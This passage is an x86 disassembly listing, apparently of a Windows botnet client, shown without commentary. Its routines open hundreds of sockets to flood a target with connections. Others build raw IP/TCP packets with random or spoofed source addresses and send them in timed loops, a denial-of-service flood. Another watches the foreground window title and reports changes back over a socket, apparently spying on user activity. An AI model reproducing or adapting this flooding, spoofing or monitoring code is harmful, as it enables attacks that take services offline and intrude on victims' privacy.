push edx ; hostshort
call htons_2
mov word ptr [ebp+to.sa_data], ax
loc_401B6D: ; CODE XREF: sub_4019BB+13E�j
; sub_4019BB+15A�j ...
cmp [ebp+var_30], edi
jg short loc_401B17
dec [ebp+var_30]
lea eax, [ebp+name]
push eax
lea eax, [ebp+var_334]
push 4262D0h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_401BB5
push edi ; int
lea eax, [ebp+var_334]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+var_130]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_401BB5: ; CODE XREF: sub_4019BB+1D8�j
lea eax, [ebp+var_334]
push eax
call sub_40CB08
push [ebp+var_20]
call sub_417735
pop ecx
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
sub_4019BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_401BD2(LPVOID)
sub_401BD2 proc near ; DATA XREF: sub_40FCA3+1573�o
var_414 = dword ptr -414h
s = dword ptr -214h
name = byte ptr -210h
var_190 = dword ptr -190h
var_110 = dword ptr -110h
var_90 = dword ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+s]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; int
lea eax, [ebp+name]
push eax ; name
call sub_401D28
push eax
lea eax, [ebp+var_414]
push 426344h
push eax
call sub_41795B
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_401C4F
push esi ; int
lea eax, [ebp+var_414]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_401C4F: ; CODE XREF: sub_401BD2+5B�j
lea eax, [ebp+var_414]
push eax
call sub_40CB08
push [ebp+var_10]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_401BD2 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401C6E(int, u_short hostshort, int)
sub_401C6E proc near ; CODE XREF: sub_401D28+27�p
s = dword ptr -654h
name = sockaddr ptr -14h
argp = dword ptr -4
arg_0 = dword ptr 8
hostshort = word ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+name]
push 0
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
mov word ptr [ebp+name.sa_data], ax
mov eax, [ebp+arg_0]
mov dword ptr [ebp+name.sa_data+2], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+argp], 1
jle short loc_401D24
push esi
push edi
mov dword ptr [ebp+hostshort], eax
mov edi, 190h
loc_401CB8: ; CODE XREF: sub_401C6E+B2�j
xor esi, esi
loc_401CBA: ; CODE XREF: sub_401C6E+77�j
push 0 ; protocol
push 1 ; type
push 2 ; af
call socket ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+esi*4+s], eax
jz short loc_401CE2
lea ecx, [ebp+argp]
push ecx ; argp
push 8004667Eh ; cmd
push eax ; s
call ioctlsocket ; ioctlsocket
loc_401CE2: ; CODE XREF: sub_401C6E+62�j
inc esi
cmp esi, edi
jl short loc_401CBA
xor esi, esi
loc_401CE9: ; CODE XREF: sub_401C6E+91�j
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push [ebp+esi*4+s] ; s
call connect ; connect
inc esi
cmp esi, edi
jl short loc_401CE9
push 64h ; dwMilliseconds
call Sleep ; Sleep
xor esi, esi
loc_401D0B: ; CODE XREF: sub_401C6E+AD�j
push [ebp+esi*4+s] ; s
call closesocket ; closesocket
inc esi
cmp esi, edi
jl short loc_401D0B
dec dword ptr [ebp+hostshort]
jnz short loc_401CB8
pop edi
pop esi
loc_401D24: ; CODE XREF: sub_401C6E+3E�j
xor eax, eax
leave
retn
sub_401C6E endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401D28(char *name, int, int)
sub_401D28 proc near ; CODE XREF: sub_401BD2+3C�p
name = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+name] ; name
call sub_40B862
push [esp+10h+arg_4]
mov edi, eax
call sub_417ECF
push [esp+14h+arg_8]
mov ebx, eax
call sub_417ECF
mov esi, eax
push esi ; int
push ebx ; hostshort
push edi ; int
call sub_401C6E
add esp, 18h
test eax, eax
jnz short loc_401D5C
inc eax
loc_401D5C: ; CODE XREF: sub_401D28+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_401D28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_401D6B(LPVOID)
sub_401D6B proc near ; DATA XREF: sub_40FCA3+39DF�o
var_414 = dword ptr -414h
s = dword ptr -214h
name = byte ptr -210h
var_190 = dword ptr -190h
var_110 = dword ptr -110h
var_90 = dword ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+s]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax ; int
lea eax, [ebp+var_190]
push eax ; int
lea eax, [ebp+name]
push eax ; name
call sub_4020B8
push eax
lea eax, [ebp+var_414]
push 42636Ch
push eax
call sub_41795B
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_401DE8
push esi ; int
lea eax, [ebp+var_414]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_401DE8: ; CODE XREF: sub_401D6B+5B�j
lea eax, [ebp+var_414]
push eax
call sub_40CB08
push [ebp+var_10]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_401D6B endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401E07(int, u_long hostlong, u_short hostshort, int)
sub_401E07 proc near ; CODE XREF: sub_4020B8+3C�p
WSAData = WSAData ptr -284h
var_F4 = byte ptr -0F4h
buf = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
to = sockaddr ptr -50h
Frequency = LARGE_INTEGER ptr -40h
optval = byte ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
s = dword ptr -0Ch
PerformanceCount= LARGE_INTEGER ptr -8
arg_0 = dword ptr 8
hostlong = dword ptr 0Ch
hostshort = word ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+buf], bl
rep stosd
stosw
stosb
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call WSAStartup_0
test eax, eax
jz short loc_401E47
xor eax, eax
jmp loc_40208B
; ---------------------------------------------------------------------------
loc_401E47: ; CODE XREF: sub_401E07+37�j
xor edi, edi
inc edi
push edi ; dwFlags
push ebx ; g
push ebx ; lpProtocolInfo
push 0FFh ; protocol
push 3 ; type
push 2 ; af
call WSASocketA ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jz loc_402083
push esi
lea ecx, [ebp+optval]
push 4 ; optlen
push ecx ; optval
push 2 ; optname
push ebx ; level
push eax ; s
mov dword ptr [ebp+optval], edi
call setsockopt_0
cmp eax, 0FFFFFFFFh
jz loc_402079
push 10h
lea eax, [ebp+to]
push ebx
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+to.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
mov esi, [ebp+arg_0]
push 28h ; hostshort
mov word ptr [ebp+to.sa_data], ax
mov dword ptr [ebp+to.sa_data+2], esi
mov [ebp+var_20], 45h
call htons_2
push dword ptr [ebp+hostshort] ; hostshort
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call htons_2
push 4000h ; hostshort
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call htons_2
mov [ebp+var_26], ax
lea eax, [ebp+Frequency]
push eax ; lpFrequency
mov [ebp+var_22], bx
mov dword ptr [ebp+hostshort], ebx
call QueryPerformanceFrequency ; QueryPerformanceFrequency
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call QueryPerformanceCounter ; QueryPerformanceCounter
push dword ptr [ebp+Frequency+4]
mov eax, [ebp+arg_C]
cdq
push dword ptr [ebp+Frequency]
push edx
push eax
call sub_417E10
add eax, dword ptr [ebp+PerformanceCount]
mov esi, edx
adc esi, dword ptr [ebp+PerformanceCount+4]
mov [ebp+var_58], eax
loc_401F32: ; CODE XREF: sub_401E07+25D�j
; sub_401E07+269�j
mov [ebp+var_24], bx
call sub_4179B7
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx ; hostshort
call htons_2
mov [ebp+var_34], ax
call sub_4179B7
mov edi, eax
shl edi, 10h
call sub_4179B7
or edi, eax
push edi ; hostshort
call htons_2
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+hostlong]
inc [ebp+hostlong]
push eax ; hostlong
call htonl_0
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi ; hostshort
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call htons_2
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_417A40
lea eax, [ebp+buf]
push 34h
push eax
call sub_40B9CB
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417A40
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_4179E0
add esp, 44h
lea eax, [ebp+buf]
push 28h
push eax
call sub_40B9CB
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
add esp, 14h
lea eax, [ebp+to]
push 10h ; tolen
push eax ; to
push ebx ; flags
lea eax, [ebp+buf]
push 28h ; len
push eax ; buf
push [ebp+s] ; s
call sendto ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_40208F
add dword ptr [ebp+hostshort], eax
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call QueryPerformanceCounter ; QueryPerformanceCounter
mov eax, dword ptr [ebp+PerformanceCount+4]
cmp eax, esi
jg short loc_402076
jl loc_401F32
mov eax, dword ptr [ebp+PerformanceCount]
cmp eax, [ebp+var_58]
jb loc_401F32
loc_402076: ; CODE XREF: sub_401E07+25B�j
mov ebx, dword ptr [ebp+hostshort]
loc_402079: ; CODE XREF: sub_401E07+78�j
; sub_401E07+2AF�j
push [ebp+s] ; s
call closesocket_0
pop esi
loc_402083: ; CODE XREF: sub_401E07+5B�j
call WSACleanup_0
mov eax, ebx
loc_40208B: ; CODE XREF: sub_401E07+3B�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40208F: ; CODE XREF: sub_401E07+247�j
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push 4263A4h
push eax
call sub_41795B
lea eax, [ebp+var_F4]
push eax
call sub_40CB08
add esp, 10h
jmp short loc_402079
sub_401E07 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4020B8(char *name, int, int)
sub_4020B8 proc near ; CODE XREF: sub_401D6B+3C�p
name = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+name] ; name
call sub_40B862
push [esp+10h+arg_4]
mov esi, eax
call sub_417ECF
push [esp+14h+arg_8]
mov ebx, eax
call sub_417ECF
mov edi, eax
call sub_4179B7
cdq
mov ecx, 200h
push edi ; int
idiv ecx
push ebx ; hostshort
lea eax, [edx+esi+100h]
push eax ; hostlong
push esi ; int
call sub_401E07
add esp, 1Ch
test eax, eax
jnz short loc_402101
inc eax
loc_402101: ; CODE XREF: sub_4020B8+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4020B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_402110(LPVOID)
sub_402110 proc near ; DATA XREF: sub_40FCA3+2DF8�o
var_440 = dword ptr -440h
var_240 = dword ptr -240h
cp = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = dword ptr -13Ch
var_BC = dword ptr -0BCh
hostshort = word ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
buf = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
to = sockaddr ptr -44h
optval = byte ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
s = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
xor esi, esi
push 0Eh
inc esi
xor ebx, ebx
mov [eax+19Ch], esi
pop ecx
xor eax, eax
lea edi, [ebp+var_9F]
mov [ebp+buf], bl
rep stosd
stosw
stosb
mov edi, GetTickCount
call edi ; GetTickCount
push eax
call sub_4179AD
pop ecx
push 0FFh ; protocol
push 3 ; type
push 2 ; af
call socket_0
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jnz short loc_4021D9
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push 426518h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_4021B9
push ebx ; int
lea eax, [ebp+var_440]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
push [ebp+var_240] ; s
call sub_40E1D6
add esp, 14h
loc_4021B9: ; CODE XREF: sub_402110+84�j
lea eax, [ebp+var_440]
push eax
call sub_40CB08
push [ebp+var_BC]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4021D9: ; CODE XREF: sub_402110+61�j
lea ecx, [ebp+optval]
push 4 ; optlen
push ecx ; optval
push 2 ; optname
push ebx ; level
push eax ; s
mov dword ptr [ebp+optval], esi
call setsockopt_0
cmp eax, 0FFFFFFFFh
jnz short loc_402257
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push 4264D0h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_402237
push ebx ; int
lea eax, [ebp+var_440]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
push [ebp+var_240] ; s
call sub_40E1D6
add esp, 14h
loc_402237: ; CODE XREF: sub_402110+102�j
lea eax, [ebp+var_440]
push eax
call sub_40CB08
push [ebp+var_BC]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_402257: ; CODE XREF: sub_402110+DF�j
lea eax, [ebp+cp]
push eax ; cp
call inet_addr_0
cmp eax, 0FFFFFFFFh
jnz short loc_4022C7
lea eax, [ebp+var_440]
push 4264A0h
push eax
call sub_41795B
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_4022A7
push ebx ; int
lea eax, [ebp+var_440]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
push [ebp+var_240] ; s
call sub_40E1D6
add esp, 14h
loc_4022A7: ; CODE XREF: sub_402110+172�j
lea eax, [ebp+var_440]
push eax
call sub_40CB08
push [ebp+var_BC]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4022C7: ; CODE XREF: sub_402110+157�j
push 10h
lea eax, [ebp+to]
push ebx
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+to.sa_family], 2
push ebx ; hostshort
call htons_2
mov word ptr [ebp+to.sa_data], ax
lea eax, [ebp+cp]
push eax ; cp
call inet_addr_0
mov dword ptr [ebp+to.sa_data+2], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
jmp loc_40252F
; ---------------------------------------------------------------------------
loc_402304: ; CODE XREF: sub_402110+433�j
push 28h ; hostshort
mov [ebp+var_2C], 45h
call htons_2
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_40235D
call sub_4179B7
mov esi, eax
shl esi, 8
call sub_4179B7
add esi, eax
shl esi, 8
call sub_4179B7
add esi, eax
shl esi, 8
call sub_4179B7
add esi, eax
mov [ebp+var_20], esi
xor esi, esi
inc esi
jmp short loc_402373
; ---------------------------------------------------------------------------
loc_40235D: ; CODE XREF: sub_402110+21E�j
push [ebp+var_240] ; s
call sub_40B972
pop ecx
push eax ; cp
call inet_addr_0
mov [ebp+var_20], eax
loc_402373: ; CODE XREF: sub_402110+24B�j
mov eax, dword ptr [ebp+to.sa_data+2]
cmp dword ptr [ebp+hostshort], ebx
mov [ebp+var_1C], eax
jnz short loc_402391
call sub_4179B7
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_402397
; ---------------------------------------------------------------------------
loc_402391: ; CODE XREF: sub_402110+26F�j
push dword ptr [ebp+hostshort] ; hostshort
loc_402397: ; CODE XREF: sub_402110+27F�j
call htons_2
mov [ebp+var_16], ax
call sub_4179B7
cdq
mov ecx, 401h
idiv ecx
push edx ; hostshort
call htons_2
push 12345678h ; hostlong
mov [ebp+var_18], ax
call htonl_0
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push 42649Ch
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4023E7
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_402443
; ---------------------------------------------------------------------------
loc_4023E7: ; CODE XREF: sub_402110+2CC�j
lea eax, [ebp+var_1BC]
push 426498h
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_402407
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_402443
; ---------------------------------------------------------------------------
loc_402407: ; CODE XREF: sub_402110+2EC�j
lea eax, [ebp+var_1BC]
push 426490h
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_402443
call sub_4179B7
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_4179B7
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_402443: ; CODE XREF: sub_402110+2D5�j
; sub_402110+2F5�j ...
push 200h ; hostshort
mov [ebp+var_C], 50h
call htons_2
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h ; hostshort
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call htons_2
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_417A40
lea eax, [ebp+buf]
push 34h
push eax
call sub_40B9CB
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_417A40
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_4179E0
add esp, 44h
lea eax, [ebp+buf]
push 28h
push eax
call sub_40B9CB
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
add esp, 14h
lea eax, [ebp+to]
push 10h ; tolen
push eax ; to
push ebx ; flags
lea eax, [ebp+buf]
push 3Ch ; len
push eax ; buf
push [ebp+s] ; s
call sendto ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4025DA
inc [ebp+arg_0]
loc_40252F: ; CODE XREF: sub_402110+1EF�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_B4]
jbe loc_402304
push [ebp+s] ; s
call closesocket_0
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+cp]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push 426430h
push eax
call sub_41795B
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_4025BA
push ebx ; int
lea eax, [ebp+var_440]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
push [ebp+var_240] ; s
call sub_40E1D6
add esp, 14h
loc_4025BA: ; CODE XREF: sub_402110+485�j
lea eax, [ebp+var_440]
push eax
call sub_40CB08
push [ebp+var_BC]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4025DA: ; CODE XREF: sub_402110+416�j
push [ebp+s] ; s
call closesocket_0
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+cp]
push [ebp+arg_0]
push eax
push 4263D0h
lea eax, [ebp+var_440]
push 200h
push eax
call sub_417EDA
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_402638
push ebx ; int
lea eax, [ebp+var_440]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
push [ebp+var_240] ; s
call sub_40E1D6
add esp, 14h
loc_402638: ; CODE XREF: sub_402110+503�j
lea eax, [ebp+var_440]
push eax
call sub_40CB08
push [ebp+var_BC]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_402110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402658(int, int, SOCKET s, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int)
sub_402658 proc near ; CODE XREF: sub_402703+E2�p
; sub_402703+1A4�p ...
var_200 = dword ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
s = dword ptr 10h
arg_10 = dword ptr 18h
arg_90 = dword ptr 98h
arg_94 = dword ptr 9Ch
push ebp
mov ebp, esp
sub esp, 200h
cmp [ebp+arg_90], 0
jz short loc_4026C8
push ebx
push esi
push 0Fh
mov esi, 426560h
pop ebx
loc_402674: ; CODE XREF: sub_402658+6A�j
push esi
push [ebp+arg_4]
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4026BB
push esi
lea eax, [ebp+var_200]
push [ebp+arg_0]
push 427450h
push 200h
push eax
call sub_417EDA
push 0 ; int
lea eax, [ebp+var_200]
push [ebp+arg_94] ; int
push eax ; int
lea eax, [ebp+arg_10]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 28h
loc_4026BB: ; CODE XREF: sub_402658+29�j
add esi, 80h
dec ebx
jnz short loc_402674
pop esi
pop ebx
jmp short loc_4026FF
; ---------------------------------------------------------------------------
loc_4026C8: ; CODE XREF: sub_402658+10�j
push [ebp+arg_0]
lea eax, [ebp+var_200]
push 42744Ch
push 200h
push eax
call sub_417EDA
push 0 ; int
lea eax, [ebp+var_200]
push [ebp+arg_94] ; int
push eax ; int
lea eax, [ebp+arg_10]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 24h
loc_4026FF: ; CODE XREF: sub_402658+6E�j
xor eax, eax
leave
retn
sub_402658 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_402703(LPVOID)
sub_402703 proc near ; DATA XREF: sub_40FCA3+49F9�o
var_920 = dword ptr -920h
var_91C = byte ptr -91Ch
var_520 = dword ptr -520h
var_4E0 = dword ptr -4E0h
var_2E1 = byte ptr -2E1h
var_2E0 = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_DC = dword ptr -0DCh
var_58 = dword ptr -58h
String = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 920h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_920], 0
push 26h
and [ebp+arg_0], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_E0]
rep movsd
mov dword ptr [eax+94h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_91C]
rep stosd
call GetForegroundWindow ; GetForegroundWindow
lea ecx, [ebp+String]
push 3Ch ; nMaxCount
push ecx ; lpString
push eax ; hWnd
mov [ebp+var_8], eax
call GetWindowTextA ; GetWindowTextA
mov ebx, 200h
loc_40275E: ; CODE XREF: sub_402703+494�j
push 8 ; dwMilliseconds
call Sleep ; Sleep
call GetForegroundWindow ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz loc_4028D6
lea ecx, [ebp+String]
push 3Ch ; nMaxCount
push ecx ; lpString
push eax ; hWnd
mov [ebp+var_8], eax
call GetWindowTextA ; GetWindowTextA
cmp [ebp+var_58], 0
jz loc_40285B
lea eax, [ebp+var_2E0]
push eax
call sub_4180D0
test eax, eax
pop ecx
jbe short loc_402814
lea eax, [ebp+String]
push eax
call sub_4180D0
cmp eax, 1
pop ecx
jnb short loc_402814
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push 4274FCh
push eax ; int
call sub_41795B
sub esp, 8Ch
lea eax, [ebp+String]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax ; int
lea eax, [ebp+var_4E0]
rep movsd
push eax ; int
call sub_402658
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_4179E0
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_4179E0
add esp, 0Ch
loc_402814: ; CODE XREF: sub_402703+9B�j
; sub_402703+AA�j
lea eax, [ebp+var_2E0]
push eax
call sub_4180D0
test eax, eax
pop ecx
jbe loc_4028D6
lea eax, [ebp+String]
push eax
call sub_4180D0
test eax, eax
pop ecx
jbe loc_4028D6
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push 4274ECh
push eax
call sub_41795B
sub esp, 8Ch
jmp short loc_40288F
; ---------------------------------------------------------------------------
loc_40285B: ; CODE XREF: sub_402703+86�j
lea eax, [ebp+String]
push eax
call sub_4180D0
test eax, eax
pop ecx
jbe loc_402981
lea eax, [ebp+String]
push eax
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push 4274C8h ; int
push eax ; int
call sub_41795B
sub esp, 88h
loc_40288F: ; CODE XREF: sub_402703+156�j
push 26h
